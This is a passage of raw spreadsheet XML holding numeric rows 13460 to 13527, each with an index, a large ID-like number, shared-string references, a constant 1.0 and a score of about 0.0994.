      </c>
      <c r="E13460" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13460" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13461" ht="15.75" customHeight="1">
      <c r="A13461" s="1">
        <v>21772.0</v>
      </c>
      <c r="B13461" s="2">
        <v>2.640812E7</v>
      </c>
      <c r="C13461" s="2" t="s">
        <v>12952</v>
      </c>
      <c r="D13461" s="2">
        <v>1.0</v>
      </c>
      <c r="E13461" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13461" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13462" ht="15.75" customHeight="1">
      <c r="A13462" s="1">
        <v>22232.0</v>
      </c>
      <c r="B13462" s="2">
        <v>3.2469159E7</v>
      </c>
      <c r="C13462" s="2" t="s">
        <v>12953</v>
      </c>
      <c r="D13462" s="2">
        <v>1.0</v>
      </c>
      <c r="E13462" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13462" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13463" ht="15.75" customHeight="1">
      <c r="A13463" s="1">
        <v>23051.0</v>
      </c>
      <c r="B13463" s="2">
        <v>5023043.0</v>
      </c>
      <c r="C13463" s="2" t="s">
        <v>12954</v>
      </c>
      <c r="D13463" s="2">
        <v>1.0</v>
      </c>
      <c r="E13463" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13463" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13464" ht="15.75" customHeight="1">
      <c r="A13464" s="1">
        <v>23093.0</v>
      </c>
      <c r="B13464" s="2">
        <v>5073096.0</v>
      </c>
      <c r="C13464" s="2" t="s">
        <v>12955</v>
      </c>
      <c r="D13464" s="2">
        <v>1.0</v>
      </c>
      <c r="E13464" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13464" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13465" ht="15.75" customHeight="1">
      <c r="A13465" s="1">
        <v>23104.0</v>
      </c>
      <c r="B13465" s="2">
        <v>5094827.0</v>
      </c>
      <c r="C13465" s="2" t="s">
        <v>12956</v>
      </c>
      <c r="D13465" s="2">
        <v>1.0</v>
      </c>
      <c r="E13465" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13465" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13466" ht="15.75" customHeight="1">
      <c r="A13466" s="1">
        <v>23553.0</v>
      </c>
      <c r="B13466" s="2">
        <v>6075796.0</v>
      </c>
      <c r="C13466" s="2" t="s">
        <v>12957</v>
      </c>
      <c r="D13466" s="2">
        <v>1.0</v>
      </c>
      <c r="E13466" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13466" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13467" ht="15.75" customHeight="1">
      <c r="A13467" s="1">
        <v>23574.0</v>
      </c>
      <c r="B13467" s="2">
        <v>6238338.0</v>
      </c>
      <c r="C13467" s="2" t="s">
        <v>12958</v>
      </c>
      <c r="D13467" s="2">
        <v>1.0</v>
      </c>
      <c r="E13467" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13467" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13468" ht="15.75" customHeight="1">
      <c r="A13468" s="1">
        <v>23784.0</v>
      </c>
      <c r="B13468" s="2">
        <v>7659333.0</v>
      </c>
      <c r="C13468" s="2" t="s">
        <v>12959</v>
      </c>
      <c r="D13468" s="2">
        <v>1.0</v>
      </c>
      <c r="E13468" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13468" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13469" ht="15.75" customHeight="1">
      <c r="A13469" s="1">
        <v>24003.0</v>
      </c>
      <c r="B13469" s="2">
        <v>9246746.0</v>
      </c>
      <c r="C13469" s="2" t="s">
        <v>12960</v>
      </c>
      <c r="D13469" s="2">
        <v>1.0</v>
      </c>
      <c r="E13469" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13469" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13470" ht="15.75" customHeight="1">
      <c r="A13470" s="1">
        <v>24833.0</v>
      </c>
      <c r="B13470" s="2">
        <v>1.2147577E7</v>
      </c>
      <c r="C13470" s="2" t="s">
        <v>12961</v>
      </c>
      <c r="D13470" s="2">
        <v>1.0</v>
      </c>
      <c r="E13470" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13470" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13471" ht="15.75" customHeight="1">
      <c r="A13471" s="1">
        <v>25954.0</v>
      </c>
      <c r="B13471" s="2">
        <v>1.5254743E7</v>
      </c>
      <c r="C13471" s="2" t="s">
        <v>12962</v>
      </c>
      <c r="D13471" s="2">
        <v>1.0</v>
      </c>
      <c r="E13471" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13471" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13472" ht="15.75" customHeight="1">
      <c r="A13472" s="1">
        <v>26016.0</v>
      </c>
      <c r="B13472" s="2">
        <v>1.5365675E7</v>
      </c>
      <c r="C13472" s="2" t="s">
        <v>12950</v>
      </c>
      <c r="D13472" s="2">
        <v>1.0</v>
      </c>
      <c r="E13472" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13472" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13473" ht="15.75" customHeight="1">
      <c r="A13473" s="1">
        <v>26494.0</v>
      </c>
      <c r="B13473" s="2">
        <v>1.7528222E7</v>
      </c>
      <c r="C13473" s="2" t="s">
        <v>12963</v>
      </c>
      <c r="D13473" s="2">
        <v>1.0</v>
      </c>
      <c r="E13473" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13473" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13474" ht="15.75" customHeight="1">
      <c r="A13474" s="1">
        <v>26725.0</v>
      </c>
      <c r="B13474" s="2">
        <v>1.824821E7</v>
      </c>
      <c r="C13474" s="2" t="s">
        <v>12964</v>
      </c>
      <c r="D13474" s="2">
        <v>1.0</v>
      </c>
      <c r="E13474" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13474" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13475" ht="15.75" customHeight="1">
      <c r="A13475" s="1">
        <v>26966.0</v>
      </c>
      <c r="B13475" s="2">
        <v>1.9640834E7</v>
      </c>
      <c r="C13475" s="2" t="s">
        <v>12965</v>
      </c>
      <c r="D13475" s="2">
        <v>1.0</v>
      </c>
      <c r="E13475" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13475" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13476" ht="15.75" customHeight="1">
      <c r="A13476" s="1">
        <v>27183.0</v>
      </c>
      <c r="B13476" s="2">
        <v>2.0873122E7</v>
      </c>
      <c r="C13476" s="2" t="s">
        <v>12966</v>
      </c>
      <c r="D13476" s="2">
        <v>1.0</v>
      </c>
      <c r="E13476" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13476" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13477" ht="15.75" customHeight="1">
      <c r="A13477" s="1">
        <v>27378.0</v>
      </c>
      <c r="B13477" s="2">
        <v>2.1740963E7</v>
      </c>
      <c r="C13477" s="2" t="s">
        <v>12967</v>
      </c>
      <c r="D13477" s="2">
        <v>1.0</v>
      </c>
      <c r="E13477" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13477" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13478" ht="15.75" customHeight="1">
      <c r="A13478" s="1">
        <v>27650.0</v>
      </c>
      <c r="B13478" s="2">
        <v>2.2812382E7</v>
      </c>
      <c r="C13478" s="2" t="s">
        <v>12968</v>
      </c>
      <c r="D13478" s="2">
        <v>1.0</v>
      </c>
      <c r="E13478" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13478" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13479" ht="15.75" customHeight="1">
      <c r="A13479" s="1">
        <v>28118.0</v>
      </c>
      <c r="B13479" s="2">
        <v>2.4684898E7</v>
      </c>
      <c r="C13479" s="2" t="s">
        <v>12969</v>
      </c>
      <c r="D13479" s="2">
        <v>1.0</v>
      </c>
      <c r="E13479" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13479" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13480" ht="15.75" customHeight="1">
      <c r="A13480" s="1">
        <v>28273.0</v>
      </c>
      <c r="B13480" s="2">
        <v>2.5400161E7</v>
      </c>
      <c r="C13480" s="2" t="s">
        <v>12970</v>
      </c>
      <c r="D13480" s="2">
        <v>1.0</v>
      </c>
      <c r="E13480" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13480" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13481" ht="15.75" customHeight="1">
      <c r="A13481" s="1">
        <v>28644.0</v>
      </c>
      <c r="B13481" s="2">
        <v>2.7304328E7</v>
      </c>
      <c r="C13481" s="2" t="s">
        <v>12971</v>
      </c>
      <c r="D13481" s="2">
        <v>1.0</v>
      </c>
      <c r="E13481" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13481" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13482" ht="15.75" customHeight="1">
      <c r="A13482" s="1">
        <v>28705.0</v>
      </c>
      <c r="B13482" s="2">
        <v>2.7756353E7</v>
      </c>
      <c r="C13482" s="2" t="s">
        <v>12972</v>
      </c>
      <c r="D13482" s="2">
        <v>1.0</v>
      </c>
      <c r="E13482" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13482" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13483" ht="15.75" customHeight="1">
      <c r="A13483" s="1">
        <v>29021.0</v>
      </c>
      <c r="B13483" s="2">
        <v>3.0100945E7</v>
      </c>
      <c r="C13483" s="2" t="s">
        <v>12973</v>
      </c>
      <c r="D13483" s="2">
        <v>1.0</v>
      </c>
      <c r="E13483" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13483" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13484" ht="15.75" customHeight="1">
      <c r="A13484" s="1">
        <v>29764.0</v>
      </c>
      <c r="B13484" s="2">
        <v>3.4849527E7</v>
      </c>
      <c r="C13484" s="2" t="s">
        <v>12974</v>
      </c>
      <c r="D13484" s="2">
        <v>1.0</v>
      </c>
      <c r="E13484" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13484" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13485" ht="15.75" customHeight="1">
      <c r="A13485" s="1">
        <v>30395.0</v>
      </c>
      <c r="B13485" s="2">
        <v>3.8694534E7</v>
      </c>
      <c r="C13485" s="2" t="s">
        <v>12975</v>
      </c>
      <c r="D13485" s="2">
        <v>1.0</v>
      </c>
      <c r="E13485" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13485" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13486" ht="15.75" customHeight="1">
      <c r="A13486" s="1">
        <v>30426.0</v>
      </c>
      <c r="B13486" s="2">
        <v>3.8949508E7</v>
      </c>
      <c r="C13486" s="2" t="s">
        <v>12976</v>
      </c>
      <c r="D13486" s="2">
        <v>1.0</v>
      </c>
      <c r="E13486" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13486" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13487" ht="15.75" customHeight="1">
      <c r="A13487" s="1">
        <v>30571.0</v>
      </c>
      <c r="B13487" s="2">
        <v>4.0969564E7</v>
      </c>
      <c r="C13487" s="2" t="s">
        <v>12977</v>
      </c>
      <c r="D13487" s="2">
        <v>1.0</v>
      </c>
      <c r="E13487" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13487" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13488" ht="15.75" customHeight="1">
      <c r="A13488" s="1">
        <v>31508.0</v>
      </c>
      <c r="B13488" s="2">
        <v>5073095.0</v>
      </c>
      <c r="C13488" s="2" t="s">
        <v>12955</v>
      </c>
      <c r="D13488" s="2">
        <v>1.0</v>
      </c>
      <c r="E13488" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13488" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13489" ht="15.75" customHeight="1">
      <c r="A13489" s="1">
        <v>32081.0</v>
      </c>
      <c r="B13489" s="2">
        <v>5386750.0</v>
      </c>
      <c r="C13489" s="2" t="s">
        <v>12978</v>
      </c>
      <c r="D13489" s="2">
        <v>1.0</v>
      </c>
      <c r="E13489" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13489" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13490" ht="15.75" customHeight="1">
      <c r="A13490" s="1">
        <v>32766.0</v>
      </c>
      <c r="B13490" s="2">
        <v>6075795.0</v>
      </c>
      <c r="C13490" s="2" t="s">
        <v>12957</v>
      </c>
      <c r="D13490" s="2">
        <v>1.0</v>
      </c>
      <c r="E13490" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13490" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13491" ht="15.75" customHeight="1">
      <c r="A13491" s="1">
        <v>33716.0</v>
      </c>
      <c r="B13491" s="2">
        <v>8512122.0</v>
      </c>
      <c r="C13491" s="2" t="s">
        <v>12979</v>
      </c>
      <c r="D13491" s="2">
        <v>1.0</v>
      </c>
      <c r="E13491" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13491" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13492" ht="15.75" customHeight="1">
      <c r="A13492" s="1">
        <v>33736.0</v>
      </c>
      <c r="B13492" s="2">
        <v>8536173.0</v>
      </c>
      <c r="C13492" s="2" t="s">
        <v>12980</v>
      </c>
      <c r="D13492" s="2">
        <v>1.0</v>
      </c>
      <c r="E13492" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13492" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13493" ht="15.75" customHeight="1">
      <c r="A13493" s="1">
        <v>33761.0</v>
      </c>
      <c r="B13493" s="2">
        <v>8624677.0</v>
      </c>
      <c r="C13493" s="2" t="s">
        <v>12981</v>
      </c>
      <c r="D13493" s="2">
        <v>1.0</v>
      </c>
      <c r="E13493" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13493" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13494" ht="15.75" customHeight="1">
      <c r="A13494" s="1">
        <v>84.0</v>
      </c>
      <c r="B13494" s="2">
        <v>1.1996553E7</v>
      </c>
      <c r="C13494" s="2" t="s">
        <v>12982</v>
      </c>
      <c r="D13494" s="2">
        <v>1.0</v>
      </c>
      <c r="E13494" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13494" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13495" ht="15.75" customHeight="1">
      <c r="A13495" s="1">
        <v>336.0</v>
      </c>
      <c r="B13495" s="2">
        <v>1.5830333E7</v>
      </c>
      <c r="C13495" s="2" t="s">
        <v>12983</v>
      </c>
      <c r="D13495" s="2">
        <v>1.0</v>
      </c>
      <c r="E13495" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13495" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13496" ht="15.75" customHeight="1">
      <c r="A13496" s="1">
        <v>646.0</v>
      </c>
      <c r="B13496" s="2">
        <v>1.9875247E7</v>
      </c>
      <c r="C13496" s="2" t="s">
        <v>12984</v>
      </c>
      <c r="D13496" s="2">
        <v>1.0</v>
      </c>
      <c r="E13496" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13496" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13497" ht="15.75" customHeight="1">
      <c r="A13497" s="1">
        <v>1355.0</v>
      </c>
      <c r="B13497" s="2">
        <v>2.5970903E7</v>
      </c>
      <c r="C13497" s="2" t="s">
        <v>12985</v>
      </c>
      <c r="D13497" s="2">
        <v>1.0</v>
      </c>
      <c r="E13497" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13497" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13498" ht="15.75" customHeight="1">
      <c r="A13498" s="1">
        <v>2042.0</v>
      </c>
      <c r="B13498" s="2">
        <v>3.0896386E7</v>
      </c>
      <c r="C13498" s="2" t="s">
        <v>12986</v>
      </c>
      <c r="D13498" s="2">
        <v>1.0</v>
      </c>
      <c r="E13498" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13498" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13499" ht="15.75" customHeight="1">
      <c r="A13499" s="1">
        <v>2516.0</v>
      </c>
      <c r="B13499" s="2">
        <v>3.4001642E7</v>
      </c>
      <c r="C13499" s="2" t="s">
        <v>12987</v>
      </c>
      <c r="D13499" s="2">
        <v>1.0</v>
      </c>
      <c r="E13499" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13499" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13500" ht="15.75" customHeight="1">
      <c r="A13500" s="1">
        <v>2741.0</v>
      </c>
      <c r="B13500" s="2">
        <v>3.5020368E7</v>
      </c>
      <c r="C13500" s="2" t="s">
        <v>12988</v>
      </c>
      <c r="D13500" s="2">
        <v>1.0</v>
      </c>
      <c r="E13500" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13500" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13501" ht="15.75" customHeight="1">
      <c r="A13501" s="1">
        <v>3365.0</v>
      </c>
      <c r="B13501" s="2">
        <v>3.7895111E7</v>
      </c>
      <c r="C13501" s="2" t="s">
        <v>12989</v>
      </c>
      <c r="D13501" s="2">
        <v>1.0</v>
      </c>
      <c r="E13501" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13501" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13502" ht="15.75" customHeight="1">
      <c r="A13502" s="1">
        <v>3654.0</v>
      </c>
      <c r="B13502" s="2">
        <v>3.9315651E7</v>
      </c>
      <c r="C13502" s="2" t="s">
        <v>12990</v>
      </c>
      <c r="D13502" s="2">
        <v>1.0</v>
      </c>
      <c r="E13502" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13502" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13503" ht="15.75" customHeight="1">
      <c r="A13503" s="1">
        <v>4516.0</v>
      </c>
      <c r="B13503" s="2">
        <v>4.260454E7</v>
      </c>
      <c r="C13503" s="2" t="s">
        <v>12991</v>
      </c>
      <c r="D13503" s="2">
        <v>1.0</v>
      </c>
      <c r="E13503" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13503" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13504" ht="15.75" customHeight="1">
      <c r="A13504" s="1">
        <v>4784.0</v>
      </c>
      <c r="B13504" s="2">
        <v>4.345304E7</v>
      </c>
      <c r="C13504" s="2" t="s">
        <v>12992</v>
      </c>
      <c r="D13504" s="2">
        <v>1.0</v>
      </c>
      <c r="E13504" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13504" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13505" ht="15.75" customHeight="1">
      <c r="A13505" s="1">
        <v>4836.0</v>
      </c>
      <c r="B13505" s="2">
        <v>4.3673133E7</v>
      </c>
      <c r="C13505" s="2" t="s">
        <v>12993</v>
      </c>
      <c r="D13505" s="2">
        <v>1.0</v>
      </c>
      <c r="E13505" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13505" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13506" ht="15.75" customHeight="1">
      <c r="A13506" s="1">
        <v>5240.0</v>
      </c>
      <c r="B13506" s="2">
        <v>4.5026324E7</v>
      </c>
      <c r="C13506" s="2" t="s">
        <v>12994</v>
      </c>
      <c r="D13506" s="2">
        <v>1.0</v>
      </c>
      <c r="E13506" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13506" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13507" ht="15.75" customHeight="1">
      <c r="A13507" s="1">
        <v>6582.0</v>
      </c>
      <c r="B13507" s="2">
        <v>4.8947709E7</v>
      </c>
      <c r="C13507" s="2" t="s">
        <v>12995</v>
      </c>
      <c r="D13507" s="2">
        <v>1.0</v>
      </c>
      <c r="E13507" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13507" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13508" ht="15.75" customHeight="1">
      <c r="A13508" s="1">
        <v>6629.0</v>
      </c>
      <c r="B13508" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C13508" s="2" t="s">
        <v>12996</v>
      </c>
      <c r="D13508" s="2">
        <v>1.0</v>
      </c>
      <c r="E13508" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13508" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13509" ht="15.75" customHeight="1">
      <c r="A13509" s="1">
        <v>7312.0</v>
      </c>
      <c r="B13509" s="2">
        <v>5.0860751E7</v>
      </c>
      <c r="C13509" s="2" t="s">
        <v>12997</v>
      </c>
      <c r="D13509" s="2">
        <v>1.0</v>
      </c>
      <c r="E13509" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13509" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13510" ht="15.75" customHeight="1">
      <c r="A13510" s="1">
        <v>7435.0</v>
      </c>
      <c r="B13510" s="2">
        <v>5.1195291E7</v>
      </c>
      <c r="C13510" s="2" t="s">
        <v>12998</v>
      </c>
      <c r="D13510" s="2">
        <v>1.0</v>
      </c>
      <c r="E13510" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13510" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13511" ht="15.75" customHeight="1">
      <c r="A13511" s="1">
        <v>7658.0</v>
      </c>
      <c r="B13511" s="2">
        <v>5.1798337E7</v>
      </c>
      <c r="C13511" s="2" t="s">
        <v>12999</v>
      </c>
      <c r="D13511" s="2">
        <v>1.0</v>
      </c>
      <c r="E13511" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13511" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13512" ht="15.75" customHeight="1">
      <c r="A13512" s="1">
        <v>8466.0</v>
      </c>
      <c r="B13512" s="2">
        <v>5.4011026E7</v>
      </c>
      <c r="C13512" s="2" t="s">
        <v>13000</v>
      </c>
      <c r="D13512" s="2">
        <v>1.0</v>
      </c>
      <c r="E13512" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13512" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13513" ht="15.75" customHeight="1">
      <c r="A13513" s="1">
        <v>8495.0</v>
      </c>
      <c r="B13513" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C13513" s="2" t="s">
        <v>13001</v>
      </c>
      <c r="D13513" s="2">
        <v>1.0</v>
      </c>
      <c r="E13513" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13513" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13514" ht="15.75" customHeight="1">
      <c r="A13514" s="1">
        <v>8521.0</v>
      </c>
      <c r="B13514" s="2">
        <v>5.4087097E7</v>
      </c>
      <c r="C13514" s="2" t="s">
        <v>13002</v>
      </c>
      <c r="D13514" s="2">
        <v>1.0</v>
      </c>
      <c r="E13514" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13514" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13515" ht="15.75" customHeight="1">
      <c r="A13515" s="1">
        <v>8608.0</v>
      </c>
      <c r="B13515" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C13515" s="2" t="s">
        <v>13003</v>
      </c>
      <c r="D13515" s="2">
        <v>1.0</v>
      </c>
      <c r="E13515" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13515" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13516" ht="15.75" customHeight="1">
      <c r="A13516" s="1">
        <v>8920.0</v>
      </c>
      <c r="B13516" s="2">
        <v>5.4820798E7</v>
      </c>
      <c r="C13516" s="2" t="s">
        <v>13004</v>
      </c>
      <c r="D13516" s="2">
        <v>1.0</v>
      </c>
      <c r="E13516" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13516" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13517" ht="15.75" customHeight="1">
      <c r="A13517" s="1">
        <v>8921.0</v>
      </c>
      <c r="B13517" s="2">
        <v>5.4820798E7</v>
      </c>
      <c r="C13517" s="2" t="s">
        <v>13005</v>
      </c>
      <c r="D13517" s="2">
        <v>1.0</v>
      </c>
      <c r="E13517" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13517" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13518" ht="15.75" customHeight="1">
      <c r="A13518" s="1">
        <v>8997.0</v>
      </c>
      <c r="B13518" s="2">
        <v>5.4968139E7</v>
      </c>
      <c r="C13518" s="2" t="s">
        <v>13006</v>
      </c>
      <c r="D13518" s="2">
        <v>1.0</v>
      </c>
      <c r="E13518" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13518" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13519" ht="15.75" customHeight="1">
      <c r="A13519" s="1">
        <v>9215.0</v>
      </c>
      <c r="B13519" s="2">
        <v>5.5429238E7</v>
      </c>
      <c r="C13519" s="2" t="s">
        <v>13007</v>
      </c>
      <c r="D13519" s="2">
        <v>1.0</v>
      </c>
      <c r="E13519" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13519" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13520" ht="15.75" customHeight="1">
      <c r="A13520" s="1">
        <v>9787.0</v>
      </c>
      <c r="B13520" s="2">
        <v>5.6526549E7</v>
      </c>
      <c r="C13520" s="2" t="s">
        <v>13008</v>
      </c>
      <c r="D13520" s="2">
        <v>1.0</v>
      </c>
      <c r="E13520" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13520" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13521" ht="15.75" customHeight="1">
      <c r="A13521" s="1">
        <v>9871.0</v>
      </c>
      <c r="B13521" s="2">
        <v>5.6729127E7</v>
      </c>
      <c r="C13521" s="2" t="s">
        <v>13009</v>
      </c>
      <c r="D13521" s="2">
        <v>1.0</v>
      </c>
      <c r="E13521" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13521" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13522" ht="15.75" customHeight="1">
      <c r="A13522" s="1">
        <v>9930.0</v>
      </c>
      <c r="B13522" s="2">
        <v>5.6830851E7</v>
      </c>
      <c r="C13522" s="2" t="s">
        <v>13010</v>
      </c>
      <c r="D13522" s="2">
        <v>1.0</v>
      </c>
      <c r="E13522" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13522" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13523" ht="15.75" customHeight="1">
      <c r="A13523" s="1">
        <v>12570.0</v>
      </c>
      <c r="B13523" s="2">
        <v>2.9979232E7</v>
      </c>
      <c r="C13523" s="2" t="s">
        <v>13011</v>
      </c>
      <c r="D13523" s="2">
        <v>1.0</v>
      </c>
      <c r="E13523" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13523" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13524" ht="15.75" customHeight="1">
      <c r="A13524" s="1">
        <v>12575.0</v>
      </c>
      <c r="B13524" s="2">
        <v>3.0011107E7</v>
      </c>
      <c r="C13524" s="2" t="s">
        <v>13012</v>
      </c>
      <c r="D13524" s="2">
        <v>1.0</v>
      </c>
      <c r="E13524" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13524" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13525" ht="15.75" customHeight="1">
      <c r="A13525" s="1">
        <v>13049.0</v>
      </c>
      <c r="B13525" s="2">
        <v>3.3154846E7</v>
      </c>
      <c r="C13525" s="2" t="s">
        <v>13013</v>
      </c>
      <c r="D13525" s="2">
        <v>1.0</v>
      </c>
      <c r="E13525" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13525" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13526" ht="15.75" customHeight="1">
      <c r="A13526" s="1">
        <v>13546.0</v>
      </c>
      <c r="B13526" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C13526" s="2" t="s">
        <v>13014</v>
      </c>
      <c r="D13526" s="2">
        <v>1.0</v>
      </c>
      <c r="E13526" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13526" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13527" ht="15.75" customHeight="1">
      <c r="A13527" s="1">
        <v>14309.0</v>
      </c>
      <c r="B13527" s="2">
        <v>3.8625921E7</v>
      </c>
      <c r="C13527" s="2" t="s">
        <v>13015</v>
      </c>
      <c r="D13527" s="2">
        <v>1.0</v>
      </c>
      <c r="E13527" s="3" t="s">
